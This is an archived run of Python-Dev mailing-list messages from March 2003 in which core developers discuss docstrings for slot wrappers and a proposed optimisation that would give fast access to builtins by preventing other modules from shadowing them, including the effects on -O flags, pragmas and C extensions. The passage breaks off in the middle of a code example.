From: greg@cosc.canterbury.ac.nz (Greg Ewing)
Date: Wed, 26 Mar 2003 12:01:00 +1200 (NZST)
Subject: [Python-Dev] Doc strings for typeslots?
In-Reply-To: <200303252302.h2PN2ER11372@pcp02138704pcs.reston01.va.comcast.net>
Message-ID: <200303260001.h2Q010211097@oma.cosc.canterbury.ac.nz>

> Um, I'm afraid this is how it is.  __xxx__ methods have generic
> docstrings. :-(

Can you just clarify a bit what you mean by "this":
would my idea of poking a docstring into the wrapper
object work, or do all types share the same wrappers?

It seems as though they *don't* share the same wrappers...

Python 2.2 (#1, Jul 11 2002, 14:19:37) 
>>> id(int.__dict__['__add__'])
135662196
>>> id(float.__dict__['__add__'])
135668268

...or is there some magic going on there that I'm
not aware of?

Thanks,

Greg Ewing, Computer Science Dept, +--------------------------------------+
University of Canterbury,	   | A citizen of NewZealandCorp, a	  |
Christchurch, New Zealand	   | wholly-owned subsidiary of USA Inc.  |
greg@cosc.canterbury.ac.nz	   +--------------------------------------+


From guido@python.org  Wed Mar 26 02:32:55 2003
From: guido@python.org (Guido van Rossum)
Date: Tue, 25 Mar 2003 21:32:55 -0500
Subject: [Python-Dev] Doc strings for typeslots?
In-Reply-To: "Your message of Wed, 26 Mar 2003 12:01:00 +1200."
 <200303260001.h2Q010211097@oma.cosc.canterbury.ac.nz>
References: <200303260001.h2Q010211097@oma.cosc.canterbury.ac.nz>
Message-ID: <200303260232.h2Q2Wts11814@pcp02138704pcs.reston01.va.comcast.net>

> > Um, I'm afraid this is how it is.  __xxx__ methods have generic
> > docstrings. :-(
> 
> Can you just clarify a bit what you mean by "this":
> would my idea of poking a docstring into the wrapper
> object work, or do all types share the same wrappers?
> 
> It seems as though they *don't* share the same wrappers...
> 
> Python 2.2 (#1, Jul 11 2002, 14:19:37) 
> >>> id(int.__dict__['__add__'])
> 135662196
> >>> id(float.__dict__['__add__'])
> 135668268
> 
> ...or is there some magic going on there that I'm
> not aware of?

The descriptors are indeed separate objects, because they wrap
different C implementations (int vs. float add).  But they contain a
pointer to a static piece of data which is shared by all wrappers, and
that's where they get their docstring.
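
The two halves of that statement can be checked separately.  A small sketch,
written for present-day Python 3 where the generic text differs from 2.2 but
the sharing works the same way (the variable names are arbitrary):

```python
int_add = int.__dict__["__add__"]
float_add = float.__dict__["__add__"]

# Separate descriptor objects, one per type ...
print(int_add is float_add)

# ... whose docstrings are nevertheless the same generic text.
print(int_add.__doc__ == float_add.__doc__)
```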

--Guido van Rossum (home page: http://www.python.org/~guido/)


From python@rcn.com  Thu Mar 27 21:37:59 2003
From: python@rcn.com (Raymond Hettinger)
Date: Thu, 27 Mar 2003 16:37:59 -0500
Subject: [Python-Dev] Fast access to __builtins__
Message-ID: <000601c2f4ab$32aed9e0$9a0fa044@oemcomputer>

From past rumblings, I gather that Python is moving
towards preventing __builtins__ from being shadowed.

I would like to know what you guys think about going ahead 
with that idea whenever the -O optimization flag is set.

The idea is to scan the code for lines like:

    LOAD_GLOBAL  2 (range)


and, if the name is found in __builtins__, then lookup
the name, add the reference to the constants table and, 
replace the code with something like:

    LOAD_CONST   5 (<built-in function range>)


The opcode replacement bypasses module level shadowing 
but leaves local shadowing intact.  For example:

modglob = 1
range = xrange
def f(list):
    for i in list:        # local shadowing of 'list' is unaffected
        print ord(i)      # access to 'ord' is optimized
        j = modglob       # non-shadowed globals are unaffected
        k = range(j)      # shadowing of globals is ignored


I've already tried out a pure python proof-of-concept and it is 
straightforward to recode it in C and attach it to PyCode_New().  
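
The proof-of-concept itself is not shown in this message.  As a rough idea
of what the scanning step might look like, here is a sketch in present-day
Python 3 using the dis module.  It is an assumption-laden illustration, not
the code referred to above: optimizable_builtins and sample are made-up
names, and unlike the proposal it takes the conservative route of skipping
any name that is also bound at module level:

```python
import builtins
import dis


def optimizable_builtins(func):
    """Names that func loads as globals and that resolve only in builtins."""
    found = set()
    for ins in dis.get_instructions(func):
        if ins.opname != "LOAD_GLOBAL":
            continue
        name = ins.argval
        if name in func.__globals__:
            continue                 # bound at module level, leave it alone
        if hasattr(builtins, name):
            found.add(name)          # candidate for a LOAD_CONST rewrite
    return sorted(found)


modglob = 1


def sample(list):
    for i in list:                   # 'list' is a local here, not a global
        ord(i)
        j = modglob
    return len(list)


print(optimizable_builtins(sample))
```

The sketch only reports candidates; actually rewriting the bytecode and
extending the constants table is the part that would move into C.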


Raymond Hettinger


From jack@performancedrivers.com  Thu Mar 27 22:15:05 2003
From: jack@performancedrivers.com (Jack Diederich)
Date: Thu, 27 Mar 2003 17:15:05 -0500
Subject: [Python-Dev] Fast access to __builtins__
In-Reply-To: <000601c2f4ab$32aed9e0$9a0fa044@oemcomputer>; from raymond.hettinger@verizon.net on Thu, Mar 27, 2003 at 04:37:59PM -0500
References: <000601c2f4ab$32aed9e0$9a0fa044@oemcomputer>
Message-ID: <20030327171505.A1450@localhost.localdomain>

On Thu, Mar 27, 2003 at 04:37:59PM -0500, Raymond Hettinger wrote:
> From past rumblings, I gather that Python is moving
> towards preventing __builtins__ from being shadowed.
> 
> I would like to know what you guys think about going ahead 
> with that idea whenever the -O optimization flag is set.
> 

The behavior of a program under -O should be as similar as possible to normal
operation.  This would break that for some programs.
A per-file pragma directive would work.  The downside of a pragma module or
keyword would be what people try to add to it later.

-jackdied


From skip@pobox.com  Thu Mar 27 22:17:53 2003
From: skip@pobox.com (Skip Montanaro)
Date: Thu, 27 Mar 2003 16:17:53 -0600
Subject: [Python-Dev] Fast access to __builtins__
In-Reply-To: <000601c2f4ab$32aed9e0$9a0fa044@oemcomputer>
References: <000601c2f4ab$32aed9e0$9a0fa044@oemcomputer>
Message-ID: <16003.30865.470726.301805@montanaro.dyndns.org>

    Raymond> From past rumblings, I gather that Python is moving towards
    Raymond> preventing __builtins__ from being shadowed.

    Raymond> I would like to know what you guys think about going ahead with
    Raymond> that idea whenever the -O optimization flag is set.

Interesting idea, but I think of shadowing builtins being somewhat
orthogonal to optimization in the usual sense (speed things up without
changing the program's semantics).  This is clearly a semantic change, so
I'd like to see a different command line flag control this behavior.

What happens if you run one program with builtin shadowing enabled, it
writes some .pyo files with your suggested change, then later you run
another program without it?  Seems like there should be some memory in the
file of how it was generated so the importer can raise an exception if it
finds a mismatch between the shadowing command line flag and a previously
generated bytecode file.

Skip


From mal@lemburg.com  Thu Mar 27 22:24:50 2003
From: mal@lemburg.com (M.-A. Lemburg)
Date: Thu, 27 Mar 2003 23:24:50 +0100
Subject: [Python-Dev] Fast access to __builtins__
In-Reply-To: <000601c2f4ab$32aed9e0$9a0fa044@oemcomputer>
References: <000601c2f4ab$32aed9e0$9a0fa044@oemcomputer>
Message-ID: <3E837A32.6010400@lemburg.com>

Raymond Hettinger wrote:
> From past rumblings, I gather that Python is moving
> towards preventing __builtins__ from being shadowed.
> 
> I would like to know what you guys think about going ahead 
> with that idea whenever the -O optimization flag is set.
> 
> The idea is to scan the code for lines like:
> 
>     LOAD_GLOBAL  2 (range)
> 
> 
> and, if the name is found in __builtins__, then lookup
> the name, add the reference to the constants table and, 
> replace the code with something like:
> 
>    LOAD_CONST   5 (<type 'range'>)

Using the -O for this is not a working possibility. -OO
is reserved for optimizations which can change semantics,
but even there, I'd rather like a per-module switch than
a command line switch.

BTW, why not have a new opcode for symbols in the
builtins and then only tweak the opcode implementation
instead of having the compiler generate different code ?

> The opcode replacement bypasses module level shadowing 
> but leaves local shadowing intact.  For example:
> 
> modglob = 1            
> range = xrange 
> def f(list):
>      for i in list:         # local shadowing of 'list' is unaffected
>           print ord(i)    # access to 'ord' is optimized
>           j = modglob  # non-shadowed globals are unaffected
>           k = range(j)   # shadowing of globals is ignored
> 
> 
> I've already tried out a pure python proof-of-concept and it is 
> straightforward to recode it in C and attach it to PyCode_New().  
> 
> 
> Raymond Hettinger
> 

-- 
Marc-Andre Lemburg
eGenix.com

Professional Python Software directly from the Source  (#1, Mar 27 2003)
 >>> Python/Zope Products & Consulting ...         http://www.egenix.com/
 >>> mxODBC, mxDateTime, mxTextTools ...        http://python.egenix.com/
________________________________________________________________________
Python UK 2003, Oxford:                                      5 days left
EuroPython 2003, Charleroi, Belgium:                        89 days left


From python@rcn.com  Fri Mar 28 00:35:20 2003
From: python@rcn.com (Raymond Hettinger)
Date: Thu, 27 Mar 2003 19:35:20 -0500
Subject: [Python-Dev] Fast access to __builtins__
References: <000601c2f4ab$32aed9e0$9a0fa044@oemcomputer> <3E837A32.6010400@lemburg.com>
Message-ID: <003601c2f4c1$ea28c0c0$df10a044@oemcomputer>

[Jack Diederich]
> The behavior of a program under -O should be as similar as possible to normal
> operation.  This would break that for some programs.
> A per-file pragma directive would work.

[Skip Montanaro]
> This is clearly a semantic change, so
> I'd like to see a different command line flag control this behavior

[M.-A. Lemburg]
> Using the -O for this is not a working possibility. -OO
> is reserved for optimizations which can change semantics,
> but even there, I'd rather like a per-module switch than
> a command line switch.

That makes good sense.  
Are you guys thinking of something like this:

__fastbuiltins__ = True  # optimize all subsequent defs in the module


[Jack Diederich]
> The downside of a pragma module or
> keyword would be what people try to add to it later.

Ideally, enabling the pragma would also trigger warnings when the
module shadows a builtin.


[M.-A. Lemburg]
> BTW, why not have a new opcode for symbols in the
> builtins and then only tweak the opcode implementation
> instead of having the compiler generate different code ?

Either way results in changing one opcode/oparg pair, so I
don't see how having a new opcode helps.  At some point,
the name has to be looked-up and a reference to it stored.
Afterwards, LOAD_CONST is all that is needed to fetch
the reference.
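
The semantic difference between looking the name up on every call and
storing a reference once can be shown without touching bytecode.  In the
sketch below (present-day Python 3) a default argument plays the role of
the constants-table entry; this is a stand-in chosen for illustration, not
the proposed mechanism, and all the names are hypothetical:

```python
import builtins


def late_bound(seq):
    # 'len' is resolved on every call: module globals first, then builtins.
    return len(seq)


def early_bound(seq, _len=builtins.len):
    # The reference was captured once, when the def statement ran.
    return _len(seq)


def fake_len(seq):
    return -1


len = fake_len                      # module-level shadowing of the builtin
late_result = late_bound("abc")     # sees the shadow
early_result = early_bound("abc")   # still uses the real builtin
del len                             # remove the shadow again

print(late_result, early_result)
```

The second function behaves the way the optimized code would: shadowing
that happens after the reference is stored goes unnoticed.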


Raymond Hettinger


From nas@python.ca  Fri Mar 28 02:26:49 2003
From: nas@python.ca (Neil Schemenauer)
Date: Thu, 27 Mar 2003 18:26:49 -0800
Subject: [Python-Dev] Fast access to __builtins__
In-Reply-To: <3E837A32.6010400@lemburg.com>
References: <000601c2f4ab$32aed9e0$9a0fa044@oemcomputer> <3E837A32.6010400@lemburg.com>
Message-ID: <20030328022649.GA30139@glacier.arctrix.com>

M.-A. Lemburg wrote:
> Using the -O for this is not a working possibility. -OO
> is reserved for optimizations which can change semantics,
> but even there, I'd rather like a per-module switch than
> a command line switch.

Optimization options that globally change semantics seem like a bad
idea.  How would you know some module you are using will not break?  I
agree with Marc-Andre that a per-module switch would be better.

In this case, I'm not sure either option is necessary.  If I understand
Guido correctly, eventually programs may not be allowed to stick names
into other modules that override builtins used by that module.  If that
is disallowed then the compiler knows if a name is a builtin or a
global.

We could introduce a warning for code that breaks the new rules and have
a __future__ statement that implements the optimization.

  Neil


From greg@cosc.canterbury.ac.nz  Fri Mar 28 02:48:37 2003
From: greg@cosc.canterbury.ac.nz (Greg Ewing)
Date: Fri, 28 Mar 2003 14:48:37 +1200 (NZST)
Subject: [Python-Dev] Fast access to __builtins__
In-Reply-To: <20030328022649.GA30139@glacier.arctrix.com>
Message-ID: <200303280248.h2S2mb621846@oma.cosc.canterbury.ac.nz>

Neil Schemenauer <nas@python.ca>:

> Optimization options that globally change semantics seem like a bad
> idea.  How would you know some module you are using will not break?  I
> agree with Marc-Andre that a per-module switch would be better.

There's something a bit strange about this situation,
though.

The compiler knows whether a module shadows any of its
*own* builtins, and can avoid applying the optimisation
to those names. So the optimisation doesn't change the
semantics of the module itself, provided some conditions
are met.

But those conditions depend on things *outside* the
module -- namely, whether any *other* module assigns
to one of this module's globals so as to shadow a
builtin.

This makes me think that having a flag inside the
module is not the right thing to do, or at least it's
not the only thing that's needed. There needs to be
a way to turn the optimisation *off* from outside the 
affected module.

Greg Ewing, Computer Science Dept, +--------------------------------------+
University of Canterbury,	   | A citizen of NewZealandCorp, a	  |
Christchurch, New Zealand	   | wholly-owned subsidiary of USA Inc.  |
greg@cosc.canterbury.ac.nz	   +--------------------------------------+


From jack@performancedrivers.com  Fri Mar 28 03:21:10 2003
From: jack@performancedrivers.com (Jack Diederich)
Date: Thu, 27 Mar 2003 22:21:10 -0500
Subject: [Python-Dev] Fast access to __builtins__
In-Reply-To: <003601c2f4c1$ea28c0c0$df10a044@oemcomputer>; from python@rcn.com on Thu, Mar 27, 2003 at 07:35:20PM -0500
References: <000601c2f4ab$32aed9e0$9a0fa044@oemcomputer> <3E837A32.6010400@lemburg.com> <003601c2f4c1$ea28c0c0$df10a044@oemcomputer>
Message-ID: <20030327222109.B1450@localhost.localdomain>

On Thu, Mar 27, 2003 at 07:35:20PM -0500, Raymond Hettinger wrote:
[Raymond proposed this pythonic version of a pragma]
> __fastbuiltins__ = True  # optimize all subsequent defs in the module
>
> [Jack Diederich]
> > The downside of a pragma module or
> > keyword would be what people try to add to it later.
> 
> Ideally, enabling the pragma would also trigger warnings when the
> module shadows a builtin.

I was thinking that a first-class keyword like
pragma no_shadow_builtins
would give people a hook to suggest all kinds of nastiness in the future.
In your pythonness your suggestion avoided this entirely.

We are talking about a very per-module thing, and author's intent.
As a progression, how about a subclass of dict that implements
warn-on-assign and error-on-assign properties.  Having a subclass of dicts
specifically for symbol tables has been suggested before and has a wide
variety of benefits[1].  This is a good example.

-jackdied

[1] benefits of a specific 'symtab' type that derives from dict
 (all variations on 'one stop shop for optimizations')
 * string-only
 * assign-once (builtins)
 * cached lookups


From guido@python.org  Fri Mar 28 03:23:22 2003
From: guido@python.org (Guido van Rossum)
Date: Thu, 27 Mar 2003 22:23:22 -0500
Subject: [Python-Dev] Fast access to __builtins__
In-Reply-To: "Your message of Thu, 27 Mar 2003 16:37:59 EST."
 <000601c2f4ab$32aed9e0$9a0fa044@oemcomputer>
References: <000601c2f4ab$32aed9e0$9a0fa044@oemcomputer>
Message-ID: <200303280323.h2S3NMQ18471@pcp02138704pcs.reston01.va.comcast.net>

Hi Raymond.  Too bad you couldn't make it to the conference!  We're
all having a great time on and off the GWU premises.  I used your
"more zen" on a slide in my keynote.

> From past rumblings, I gather that Python is moving
> towards preventing __builtins__ from being shadowed.

You must be misunderstanding.

The only thing I want to forbid is to stick a name in *another*
module's globals that would shadow a builtin.  E.g. suppose module A
contains:

  def f(a):
      return len(a)

and module B contains:

  import A
  A.len = lambda a: len(a) or 1 # evil len()

The assignment to A.len would be forbidden.

OTOH this:

  import random
  if random.random() >= 0.5:
    len = 42
  def f():
     return len

will always be allowed and mean what it currently means.

The difference is that in the first example, analysis of module A does
not reveal that len is shadowed; OTOH in the second example, analyzing
just the module's code shows that len may be a global shadowing the
built-in.  This
is important because a programmer shouldn't have to know the names of
built-in objects she doesn't use (also important because in a future
version of the language, a name you've picked for a global may become
a builtin).

The idea of forbidding module B in the first example is that the
optimizer is allowed to replace len(a) with a bytecode that calls
PyObject_Size() rather than looking up "len" in globals and builtins.
The optimizer should only be allowed to make this assumption if
careful analysis of an entire module doesn't reveal any possibility
that "len" can be shadowed.  But it cannot be required to look at all
other modules (since those other modules may not even have been
written!).
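
The first example can be reproduced in a single file, as a minimal
sketch. The module object A is built by hand here (an assumption made
for the sake of a self-contained demo); the injection is what module B
does in the example.

```python
import types

# Hypothetical stand-in for module A: its own code never rebinds "len".
A = types.ModuleType("A")
exec("def f(a):\n    return len(a)\n", A.__dict__)

before = A.f([])                 # builtin len is used: 0

# What module B does: stick a name into A's globals from the outside.
A.len = lambda a: len(a) or 1    # evil len()

after = A.f([])                  # A.f now sees the injected global: 1
print(before, after)
```

Nothing in A's source changes between the two calls, which is why
analysis of A alone cannot detect the shadowing.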

Hope this helps.

BTW this idea is quite old; I've described it a few years ago under a
subject something like "low-hanging fruit".

--Guido van Rossum (home page: http://www.python.org/~guido/)


From nas@python.ca  Fri Mar 28 03:50:31 2003
From: nas@python.ca (Neil Schemenauer)
Date: Thu, 27 Mar 2003 19:50:31 -0800
Subject: [Python-Dev] Fast access to __builtins__
In-Reply-To: <200303280323.h2S3NMQ18471@pcp02138704pcs.reston01.va.comcast.net>
References: <000601c2f4ab$32aed9e0$9a0fa044@oemcomputer> <200303280323.h2S3NMQ18471@pcp02138704pcs.reston01.va.comcast.net>
Message-ID: <20030328035031.GB30245@glacier.arctrix.com>

Guido van Rossum wrote:
> BTW this idea is quite old; I've described it a few years ago under a
> subject something like "low-hanging fruit".

I really like this idea.  If a patch appeared on SF soon, do you think
2.3 could include a warning for code that violates the rule?

If so, how about also including a flag to allow optimizations based on
the rule?  For example, I think we could have the equivalent of
LOAD_FAST for builtin names.  Implementing the optimizations could be a
bit of work, especially with the existing compiler, but I think the
warning should be fairly easy.

  Neil


From guido@python.org  Fri Mar 28 04:15:41 2003
From: guido@python.org (Guido van Rossum)
Date: Thu, 27 Mar 2003 23:15:41 -0500
Subject: [Python-Dev] Fast access to __builtins__
In-Reply-To: "Your message of Thu, 27 Mar 2003 19:50:31 PST."
 <20030328035031.GB30245@glacier.arctrix.com>
References: <000601c2f4ab$32aed9e0$9a0fa044@oemcomputer>
 <200303280323.h2S3NMQ18471@pcp02138704pcs.reston01.va.comcast.net>
 <20030328035031.GB30245@glacier.arctrix.com>
Message-ID: <200303280415.h2S4Ff019207@pcp02138704pcs.reston01.va.comcast.net>

> Guido van Rossum wrote:
> > BTW this idea is quite old; I've described it a few years ago under a
> > subject something like "low-hanging fruit".
> 
> I really like this idea.  If a patch appeared on SF soon, do you think
> 2.3 could include a warning for code that violates the rule?

Maybe.  Though you probably would only want to warn when this is done
to a .py module -- C extensions should be exempt.  And the warning
should only warn about inserting names that are actually builtins.

> If so, how about also including a flag to allow optimizations based on
> the rule?  For example, I think we could have the equivalent of
> LOAD_FAST for builtin names.  Implementing the optimizations could be a
> bit of work, especially with the existing compiler, but I think the
> warning should be fairly easy.

Sure, let's experiment!

--Guido van Rossum (home page: http://www.python.org/~guido/)


From jeremy@alum.mit.edu  Fri Mar 28 04:45:31 2003
From: jeremy@alum.mit.edu (Jeremy Hylton)
Date: 27 Mar 2003 23:45:31 -0500
Subject: [Python-Dev] Fast access to __builtins__
In-Reply-To: <200303280415.h2S4Ff019207@pcp02138704pcs.reston01.va.comcast.net>
References: <000601c2f4ab$32aed9e0$9a0fa044@oemcomputer>
 <200303280323.h2S3NMQ18471@pcp02138704pcs.reston01.va.comcast.net>
 <20030328035031.GB30245@glacier.arctrix.com>
 <200303280415.h2S4Ff019207@pcp02138704pcs.reston01.va.comcast.net>
Message-ID: <1048826730.23083.90.camel@localhost.localdomain>

On Thu, 2003-03-27 at 23:15, Guido van Rossum wrote:
> > I really like this idea.  If a patch appeared on SF soon, do you think
> > 2.3 could include a warning for code that violates the rule?
> 
> Maybe.  Though you probably would only want to warn when this is done
> to a .py module -- C extensions should be exempt.  And the warning
> should only warn about inserting names that are actually builtins.

It seems like C extensions pose thorny problems that need to be solved. 
In particular, the C API says that modules have a dictionary and that
adding a key creates a global variable in the module.  We'll have to break
this one way or another, because we don't want to allow C extensions to
add globals that shadow builtins.  Right?

There's a similar problem for Python code, but I imagine it's easy to
come up with a dict proxy with the necessary restrictions along the
lines of a new-style class dict proxy.

How do we break the C API?  There's lots of extension code that relies
on getting the dict.  My first guess is to add an exception that says
setting a name that shadows a builtin has no effect.  Then extend the
getattr code and the module-dict-proxy to ignore those names.

Jeremy


From guido@python.org  Fri Mar 28 04:49:16 2003
From: guido@python.org (Guido van Rossum)
Date: Thu, 27 Mar 2003 23:49:16 -0500
Subject: [Python-Dev] Fast access to __builtins__
In-Reply-To: "Your message of 27 Mar 2003 23:45:31 EST."
 <1048826730.23083.90.camel@localhost.localdomain>
References: <000601c2f4ab$32aed9e0$9a0fa044@oemcomputer>
 <200303280323.h2S3NMQ18471@pcp02138704pcs.reston01.va.comcast.net>
 <20030328035031.GB30245@glacier.arctrix.com>
 <200303280415.h2S4Ff019207@pcp02138704pcs.reston01.va.comcast.net>
 <1048826730.23083.90.camel@localhost.localdomain>
Message-ID: <200303280449.h2S4nGn19327@pcp02138704pcs.reston01.va.comcast.net>

> It seems like C extensions pose thorny problems that need to be solved. 
> In particular, the C API says that modules have a dictionary and that
> adding a key creates a global variable in the module.  We'll have to break
> this one way or another, because we don't want to allow C extensions to
> add globals that shadow builtins.  Right?

I don't see the problem.  Typically, C extension modules don't have
Python code that runs in their globals, so messing with a C
extension's globals from the outside has no bad effect on Python code.

The problem is more that once a module is loaded, you can't tell from
the module whether it was loaded from a .py module or a C extension.

> There's a similar problem for Python code, but I imagine it's easy to
> come up with a dict proxy with the necessary restrictions along the
> lines of a new-style class dict proxy.

I'd be happy to proclaim that doing something like

  import X
  d = X.__dict__
  d["spam"] = 42    # or  exec "spam = 42" in d 

is always prohibited.

> How do we break the C API?  There's lots of extension code that relies
> on getting the dict.  My first guess is to add an exception that says
> setting a name that shadows a builtin has no effect.  Then extend the
> getattr code and the module-dict-proxy to ignore those names.

The C code can continue to access the real dict.  This is what happens
for new-style classes: in Python, C.__dict__ is a read-only proxy, but
in C, C->tp_dict is a real dict.  Then the setattr operation can do as
it pleases.  For new-style classes, it doesn't forbid anything but
updates the type struct when an operator was modified; for modules, it
could issue a warning when a name is set that didn't exist before and
that shadows a built-in.  (Ideally, it should only warn about
built-ins that are actually used by the module's code, but that
requires the parser to make the list of such built-ins available
somehow.)
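
The warning behaviour can be prototyped in pure Python by overriding
__setattr__ on a module subclass. This is only a sketch of the rule "warn
when a name is set that didn't exist before and that shadows a
built-in"; the class name GuardedModule is hypothetical, and the real
change would live in the module type's C-level setattr slot.

```python
import builtins
import types
import warnings


class GuardedModule(types.ModuleType):
    """Hypothetical module type that warns on new globals shadowing builtins."""

    def __setattr__(self, name, value):
        is_new = name not in self.__dict__
        shadows = name in vars(builtins) and not name.startswith("__")
        if is_new and shadows:
            warnings.warn(
                "%s.%s shadows a builtin" % (self.__name__, name),
                RuntimeWarning,
                stacklevel=2,
            )
        super().__setattr__(name, value)


mod = GuardedModule("A")
with warnings.catch_warnings(record=True) as caught:
    warnings.simplefilter("always")
    mod.spam = 1                   # not a builtin name: no warning
    mod.len = lambda a: 1          # new name shadowing a builtin: warning
    mod.len = len                  # name already exists: no warning
    mod.__dict__["open"] = None    # direct dict access bypasses __setattr__

print(len(caught))
```

Only attribute assignment is intercepted; writes through the module's
dict go unnoticed in this sketch.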

Anyway, the C code that accesses the dict usually lives in the
extension module's init function.

Frankly, I'm a bit confused by your post.  Maybe I don't understand
what you're proposing?

--Guido van Rossum (home page: http://www.python.org/~guido/)


From nas@python.ca  Fri Mar 28 05:51:13 2003
From: nas@python.ca (Neil Schemenauer)
Date: Thu, 27 Mar 2003 21:51:13 -0800
Subject: [Python-Dev] Fast access to __builtins__
In-Reply-To: <200303280415.h2S4Ff019207@pcp02138704pcs.reston01.va.comcast.net>
References: <000601c2f4ab$32aed9e0$9a0fa044@oemcomputer> <200303280323.h2S3NMQ18471@pcp02138704pcs.reston01.va.comcast.net> <20030328035031.GB30245@glacier.arctrix.com> <200303280415.h2S4Ff019207@pcp02138704pcs.reston01.va.comcast.net>
Message-ID: <20030328055113.GA30405@glacier.arctrix.com>

Guido van Rossum wrote:
> Though you probably would only want to warn when this is done to a .py
> module -- C extensions should be exempt.

Exempt from poking or being poked?

> And the warning should only warn about inserting names that are
> actually builtins.

I have a rough patch.  The idea is to have the tp_setattro slot of modules
check if the name being set is a builtin.  It seems to work but perhaps
there are cases that make that approach invalid.  Time for bed now. :-)

  Neil


From mal@lemburg.com  Fri Mar 28 08:34:54 2003
From: mal@lemburg.com (M.-A. Lemburg)
Date: Fri, 28 Mar 2003 09:34:54 +0100
Subject: [Python-Dev] Fast access to __builtins__
In-Reply-To: <003601c2f4c1$ea28c0c0$df10a044@oemcomputer>
References: <000601c2f4ab$32aed9e0$9a0fa044@oemcomputer>	<3E837A32.6010400@lemburg.com> <003601c2f4c1$ea28c0c0$df10a044@oemcomputer>
Message-ID: <3E84092E.1080803@lemburg.com>

Raymond Hettinger wrote:
> [per module switch]
> That makes good sense.  
> Are you guys thinking of something like this:
> 
> __fastbuiltins__ = True  # optimize all subsequent defs in the module
> 
> [M.-A. Lemburg]
> 
>>BTW, why not have a new opcode for symbols in the
>>builtins and then only tweak the opcode implementation
>>instead of having the compiler generate different code ?
> 
> Either way results in changing one opcode/oparg pair, so I
> don't see how having a new opcode helps.  At some point,
> the name has to be looked-up and a reference to it stored.
> Afterwards, LOAD_CONST is all that is needed to fetch
> the reference.

Right, but with the new opcode you could have the interpreter
decide whether to optimize or not without recompiling the
code.

-- 
Marc-Andre Lemburg
eGenix.com

Professional Python Software directly from the Source  (#1, Mar 28 2003)
 >>> Python/Zope Products & Consulting ...         http://www.egenix.com/
 >>> mxODBC, mxDateTime, mxTextTools ...        http://python.egenix.com/
________________________________________________________________________
Python UK 2003, Oxford:                                      4 days left
EuroPython 2003, Charleroi, Belgium:                        88 days left


From mal@lemburg.com  Fri Mar 28 08:38:28 2003
From: mal@lemburg.com (M.-A. Lemburg)
Date: Fri, 28 Mar 2003 09:38:28 +0100
Subject: [Python-Dev] Fast access to __builtins__
In-Reply-To: <200303280449.h2S4nGn19327@pcp02138704pcs.reston01.va.comcast.net>
References: <000601c2f4ab$32aed9e0$9a0fa044@oemcomputer> <200303280323.h2S3NMQ18471@pcp02138704pcs.reston01.va.comcast.net> <20030328035031.GB30245@glacier.arctrix.com> <200303280415.h2S4Ff019207@pcp02138704pcs.reston01.va.comcast.net> <1048826730.23083.90.camel@localhost.localdomain> <200303280449.h2S4nGn19327@pcp02138704pcs.reston01.va.comcast.net>
Message-ID: <3E840A04.6070700@lemburg.com>

Guido van Rossum wrote:
> I'd be happy to proclaim that doing something like
> 
>   import X
>   d = X.__dict__
>   d["spam"] = 42    # or  exec "spam = 42" in d 
> 
> is always prohibited.

That would break lazy module imports such as the one I'm using
in mx.Misc.LazyModule.py.

-- 
Marc-Andre Lemburg
eGenix.com



From aleax@aleax.it  Fri Mar 28 09:31:30 2003
From: aleax@aleax.it (Alex Martelli)
Date: Fri, 28 Mar 2003 10:31:30 +0100
Subject: [Python-Dev] Fast access to __builtins__
In-Reply-To: <200303280449.h2S4nGn19327@pcp02138704pcs.reston01.va.comcast.net>
References: <000601c2f4ab$32aed9e0$9a0fa044@oemcomputer> <1048826730.23083.90.camel@localhost.localdomain> <200303280449.h2S4nGn19327@pcp02138704pcs.reston01.va.comcast.net>
Message-ID: <200303281031.30093.aleax@aleax.it>

On Friday 28 March 2003 05:49 am, Guido van Rossum wrote:
   ...
> I don't see the problem.  Typically, C extension modules don't have
> Python code that runs in their globals, so messing with a C
> extension's globals from the outside has no bad effect on Python code.

It happens, though -- for code whose performance is not important,
e.g. initialization and "resetting" kind of stuff, a PyRun_String can be
SO much more concise and handier than meticulous expansion of
basically the same things into tens of lines of C code... since
"messing from the outside" happens after initialization, and the use
cases I can easily find are all specifically DURING initialization, it may
be that this problem is too rare to worry about, but, I'm not so sure.


Alex


From oren-py-d@hishome.net  Fri Mar 28 09:44:42 2003
From: oren-py-d@hishome.net (Oren Tirosh)
Date: Fri, 28 Mar 2003 04:44:42 -0500
Subject: [Python-Dev] Fast access to __builtins__
In-Reply-To: <20030328055113.GA30405@glacier.arctrix.com>
References: <000601c2f4ab$32aed9e0$9a0fa044@oemcomputer> <200303280323.h2S3NMQ18471@pcp02138704pcs.reston01.va.comcast.net> <20030328035031.GB30245@glacier.arctrix.com> <200303280415.h2S4Ff019207@pcp02138704pcs.reston01.va.comcast.net> <20030328055113.GA30405@glacier.arctrix.com>
Message-ID: <20030328094441.GA10818@hishome.net>

On Thu, Mar 27, 2003 at 09:51:13PM -0800, Neil Schemenauer wrote:
> Guido van Rossum wrote:
> > Though you probably would only want to warn when this is done to a .py
> > module -- C extensions should be exempt.
> 
> Exempt from poking or being poked?
> 
> > And the warning should only warn about inserting names that are
> > actually builtins.
> 
> I have a rough patch.  The idea is to have the tp_setattro slot of modules
> check if the name being set is a builtin.  

Does it check whether the name is in the standard __builtin__ module, or
whether it is an attribute of whatever object is currently set as the
module's __builtins__ attribute?

    Oren


From python@rcn.com  Fri Mar 28 10:58:44 2003
From: python@rcn.com (Raymond Hettinger)
Date: Fri, 28 Mar 2003 05:58:44 -0500
Subject: [Python-Dev] Fast access to __builtins__
References: <000601c2f4ab$32aed9e0$9a0fa044@oemcomputer> <200303280323.h2S3NMQ18471@pcp02138704pcs.reston01.va.comcast.net>
Message-ID: <005d01c2f519$00acb020$aa11a044@oemcomputer>

[GvR]
> Hi Raymond.  Too bad you couldn't make it to the conference!  We're
> all having a great time on and off the GWU premises. 

Glad you guys are having a great time.  I wish I could be there.


> I used your "more zen" on a slide in my keynote.

Cool.  Any chance of getting your keynote slides on the net?


> > From past rumblings, I gather that Python is moving
> > towards preventing __builtins__ from being shadowed.
> 
> You must be misunderstanding.
> 
> The only thing I want to forbid is to stick a name in *another*
> module's globals that would shadow a builtin.

Yes, that *is* different.  
Allowing shadows means having to watch out for trees.


> The idea of forbidding module B in the first example is that the
> optimizer is allowed to replace len(a) with a bytecode that calls
> PyObject_Size() rather than looking up "len" in globals and builtins.
> The optimizer should only be allowed to make this assumption if
> careful analysis of an entire module doesn't reveal any possibility
> that "len" can be shadowed
 . . .
> BTW this idea is quite old; I've described it a few years ago under a
> subject something like "low-hanging fruit".


The fruit is a bit high.  Doing a full module analysis means
deferring the optimization for a second pass after all the code
has already been generated.  It's doable, but much harder.

def f(x):
    return len(x) + 10       # knowing whether to optimize this

def g():
